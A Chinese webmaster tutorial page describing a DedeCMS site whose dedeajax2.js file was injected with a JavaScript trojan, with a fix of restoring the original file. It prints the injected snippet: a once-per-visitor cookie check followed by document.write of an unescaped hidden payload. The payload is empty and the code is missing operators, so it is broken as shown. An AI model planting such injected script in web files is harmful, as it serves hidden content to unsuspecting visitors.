站长之家 - 站长资讯 - 易采站长站

当前位置: > 建站教程 > 源码教程 > CMS 教程 >

dedecms:dedeajax2.js被植入js木马

2018-05-22 09:53 | 来源:易采源码网 | 编辑:admin |

这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:

//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}

用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。

不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。

关键字描述:木马 obj " if new // null var dede 植入

  • dedecms:dedeajax2.js被植入js木马-DedeCms教程
  • 动易cms后台管理界面出错
  • PhpCms系统安全设置图文教程
  • PHPCMS开启全文搜索(sphinx)后搜索无效的解决方法
  • PHPCMS 模板制作教程 黑夜之舞出品
  • dedecms针对DDOS挂马漏洞的解决方法
  • dedecms自定义表单用js代替联动类型解决联动问题
  • 使用织梦cms做多语言的网站(图解)
  • 织梦网站后台底部被挂黑链的解决方法详细解析
  • 织梦DEDECMS中让近三天发布的文章显示红色日期或加上new字或小图片的方
  • 网友评论

    关于我们 - 联系我们 - 广告服务 - 版权声明 - 人才招聘 - 友情链接 - 网站地图 - 帮助 - -

    CopyRight © 2010-2016 源码下载 easck.com , All Rights Reserved

    蒙公网安备 15052402000103号

    蒙ICP备14002389-1号